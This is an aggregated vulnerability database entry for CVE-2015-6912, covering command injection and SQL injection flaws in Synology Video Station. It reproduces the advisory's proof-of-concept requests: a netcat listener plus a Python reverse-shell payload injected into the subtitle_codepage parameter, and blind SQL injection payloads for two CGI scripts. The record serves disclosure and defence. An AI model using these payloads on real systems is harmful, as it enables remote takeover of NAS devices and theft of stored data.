ID

VAR-201509-0204


CVE

CVE-2015-6912


TITLE

Synology Video Station arbitrary shell command execution vulnerability

Trust: 0.8

sources: JVNDB: JVNDB-2015-004689

DESCRIPTION

Synology Video Station before 1.5-0763 allows remote attackers to execute arbitrary shell commands via shell metacharacters in the subtitle_codepage parameter to subtitle.cgi.

Supplementary information: the vulnerability type has been identified as CWE-77: Improper Neutralization of Special Elements used in a Command (Command Injection).

Synology Video Station is a video manager from Synology. The vulnerability is caused by the fact that the subtitle.cgi file does not adequately filter shell metacharacters in the 'subtitle_codepage' parameter. In addition, Video Station is affected by multiple SQL injection vulnerabilities that allow for execution of arbitrary SQL statements with DBA privileges. As a result it is possible to compromise the PostgreSQL database server.

------------------------------------------------------------------------
Affected versions
------------------------------------------------------------------------

These issues affect Synology Video Station versions up to and including 1.5-0757.

The script subtitle.cgi can also be called when the 'public share' option is enabled. With this option enabled, this issue can also be exploited by an unauthenticated remote attacker. This vulnerability can be used to compromise a Synology DiskStation NAS, including all data stored on the NAS, and to use the NAS as a stepping stone to attack other systems.

- Start netcat on attacker's system: nc -nvlp 80
- Submit the following request (change the IP - 192.168.1.20 - & port number - 80):

GET /webapi/VideoStation/subtitle.cgi?id=193&api=SYNO.VideoStation.Subtitle&method=get&version=2&subtitle_id=%2Fvolume1%2Fvideo%2Fmr.robot.s01e10.720p.hdtv.x264-killers.nfo%2FMr.Robot.S01E10.720p.HDTV.x264-KILLERS.2aafa5c.eng.srt&subtitle_codepage=auto%26python%20-c%20'import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.1.20%22,80));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call(%5b%22/bin/sh%22,%22-i%22%5d);'%26&preview=false&sharing_id=kSiNy0Pp HTTP/1.1
Host: 192.168.1.13:5000
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

SQL injection vulnerability in watchstatus.cgi

A (blind) SQL injection vulnerability exists in the watchstatus.cgi CGI script. This issue exists in the code handling the 'id' parameter and allows an attacker to execute arbitrary SQL statements with DBA privileges. As a result it is possible to compromise the PostgreSQL database server. In the following screenshot this issue is exploited using sqlmap.

Proof of concept

POST /webapi/VideoStation/watchstatus.cgi HTTP/1.1
Host: 192.168.1.13:5000
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-SYNO-TOKEN: Lq6mE9ANV2egU
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 80
Cookie: stay_login=0; id=Lq5QWGqg7Rnzc13A0LTN001710; jwplayer.volume=50
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

id=15076178770%20or%204864%3d4864--%20&position=10.05&api=SYNO.VideoStation.WatchStatus&method=setinfo&version=1

It should be noted that the X-SYNO-TOKEN header provides protection against Cross-Site Request Forgery attacks. As of DSM version 5.2-5592 Update 3, this protection is enabled by default.

SQL injection vulnerability in audiotrack.cgi

A (blind) SQL injection vulnerability exists in the audiotrack.cgi CGI script. This issue exists in the code handling the 'id' parameter and allows an attacker to execute arbitrary SQL statements with DBA privileges. As a result it is possible to compromise the PostgreSQL database server.

Proof of concept

POST /webapi/VideoStation/audiotrack.cgi HTTP/1.1
Content-Length: 294
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-SYNO-TOKEN: 7IKJdJMa8cutE
Host: <hostname>:5000
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0
Accept-Charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
Connection: close
Pragma: no-cache
Cache-Control: no-cache
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: stay_login=0; id=7IivlxDM9MFb213A0LTN001710

id=1%20AND%20%28SELECT%20%28CASE%20WHEN%20%28%28SELECT%20usesuper%3Dtrue%20FROM%20pg_user%20WHERE%20usename%3DCURRENT_USER%20OFFSET%200%20LIMIT%201%29%29%20THEN%20%28CHR%2849%29%29%20ELSE%20%28CHR%2848%29%29%20END%29%29%3D%28CHR%2849%29%29&api=SYNO.VideoStation.AudioTrack&method=list&version=1

Trust: 1.89

sources: NVD: CVE-2015-6912 // JVNDB: JVNDB-2015-004689 // VULHUB: VHN-84873 // VULMON: CVE-2015-6912 // PACKETSTORM: 133519

AFFECTED PRODUCTS

vendor: synology | model: video station | scope: lte | version: 1.5-0757

Trust: 1.0

vendor: synology | model: video station | scope: lt | version: 1.5-0763

Trust: 0.8

vendor: synology | model: video station | scope: eq | version: 1.5-0757

Trust: 0.6

sources: JVNDB: JVNDB-2015-004689 // CNNVD: CNNVD-201509-152 // NVD: CVE-2015-6912

CVSS

SEVERITY | CVSSV2 | CVSSV3

nvd@nist.gov: CVE-2015-6912
value: HIGH

Trust: 1.0

NVD: CVE-2015-6912
value: HIGH

Trust: 0.8

CNNVD: CNNVD-201509-152
value: CRITICAL

Trust: 0.6

VULHUB: VHN-84873
value: HIGH

Trust: 0.1

VULMON: CVE-2015-6912
value: HIGH

Trust: 0.1

nvd@nist.gov: CVE-2015-6912
severity: HIGH
baseScore: 10.0
vectorString: AV:N/AC:L/AU:N/C:C/I:C/A:C
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: COMPLETE
integrityImpact: COMPLETE
availabilityImpact: COMPLETE
exploitabilityScore: 10.0
impactScore: 10.0
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.9

VULHUB: VHN-84873
severity: HIGH
baseScore: 10.0
vectorString: AV:N/AC:L/AU:N/C:C/I:C/A:C
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: COMPLETE
integrityImpact: COMPLETE
availabilityImpact: COMPLETE
exploitabilityScore: 10.0
impactScore: 10.0
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.1

sources: VULHUB: VHN-84873 // VULMON: CVE-2015-6912 // JVNDB: JVNDB-2015-004689 // CNNVD: CNNVD-201509-152 // NVD: CVE-2015-6912

PROBLEMTYPE DATA

problemtype:CWE-77

Trust: 1.1

problemtype:CWE-Other

Trust: 0.8

sources: VULHUB: VHN-84873 // JVNDB: JVNDB-2015-004689 // NVD: CVE-2015-6912

THREAT TYPE

remote

Trust: 0.7

sources: PACKETSTORM: 133519 // CNNVD: CNNVD-201509-152

TYPE

input validation

Trust: 0.6

sources: CNNVD: CNNVD-201509-152

CONFIGURATIONS

sources: JVNDB: JVNDB-2015-004689

EXPLOIT AVAILABILITY

sources: VULHUB: VHN-84873 // VULMON: CVE-2015-6912

PATCH

title: Release Notes for Video Station | url: https://www.synology.com/en-global/releaseNote/VideoStation?model=DS715

Trust: 0.8

sources: JVNDB: JVNDB-2015-004689

EXTERNAL IDS

db: NVD | id: CVE-2015-6912

Trust: 2.6

db: PACKETSTORM | id: 133519

Trust: 1.9

db: JVNDB | id: JVNDB-2015-004689

Trust: 0.8

db: CNNVD | id: CNNVD-201509-152

Trust: 0.7

db: EXPLOIT-DB | id: 38128

Trust: 0.2

db: VULHUB | id: VHN-84873

Trust: 0.1

db: VULMON | id: CVE-2015-6912

Trust: 0.1

sources: VULHUB: VHN-84873 // VULMON: CVE-2015-6912 // JVNDB: JVNDB-2015-004689 // PACKETSTORM: 133519 // CNNVD: CNNVD-201509-152 // NVD: CVE-2015-6912

REFERENCES

url:https://www.synology.com/en-global/releasenote/videostation?model=ds715

Trust: 1.8

url:http://seclists.org/fulldisclosure/2015/sep/31

Trust: 1.8

url:http://packetstormsecurity.com/files/133519/synology-video-station-1.5-0757-command-injection-sql-injection.html

Trust: 1.8

url:https://www.securify.nl/advisory/sfy20150810/synology_video_station_command_injection_and_multiple_sql_injection_vulnerabilities.html

Trust: 1.8

url:http://www.securityfocus.com/archive/1/536427/100/0/threaded

Trust: 1.2

url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-6912

Trust: 0.8

url:http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-6912

Trust: 0.8

url:http://www.securityfocus.com/archive/1/archive/1/536427/100/0/threaded

Trust: 0.6

url:https://cwe.mitre.org/data/definitions/77.html

Trust: 0.1

url:https://nvd.nist.gov

Trust: 0.1

url:https://www.exploit-db.com/exploits/38128/

Trust: 0.1

sources: VULHUB: VHN-84873 // VULMON: CVE-2015-6912 // JVNDB: JVNDB-2015-004689 // CNNVD: CNNVD-201509-152 // NVD: CVE-2015-6912

CREDITS

Securify B.V., Han Sahin

Trust: 0.1

sources: PACKETSTORM: 133519

SOURCES

db: VULHUB | id: VHN-84873
db: VULMON | id: CVE-2015-6912
db: JVNDB | id: JVNDB-2015-004689
db: PACKETSTORM | id: 133519
db: CNNVD | id: CNNVD-201509-152
db: NVD | id: CVE-2015-6912

LAST UPDATE DATE

2025-04-13T23:18:04.061000+00:00


SOURCES UPDATE DATE

db: VULHUB | id: VHN-84873 | date: 2018-10-09T00:00:00
db: VULMON | id: CVE-2015-6912 | date: 2018-10-09T00:00:00
db: JVNDB | id: JVNDB-2015-004689 | date: 2015-09-15T00:00:00
db: CNNVD | id: CNNVD-201509-152 | date: 2015-09-14T00:00:00
db: NVD | id: CVE-2015-6912 | date: 2025-04-12T10:46:40.837

SOURCES RELEASE DATE

db: VULHUB | id: VHN-84873 | date: 2015-09-11T00:00:00
db: VULMON | id: CVE-2015-6912 | date: 2015-09-11T00:00:00
db: JVNDB | id: JVNDB-2015-004689 | date: 2015-09-15T00:00:00
db: PACKETSTORM | id: 133519 | date: 2015-09-10T00:05:25
db: CNNVD | id: CNNVD-201509-152 | date: 2015-09-14T00:00:00
db: NVD | id: CVE-2015-6912 | date: 2015-09-11T16:59:18.707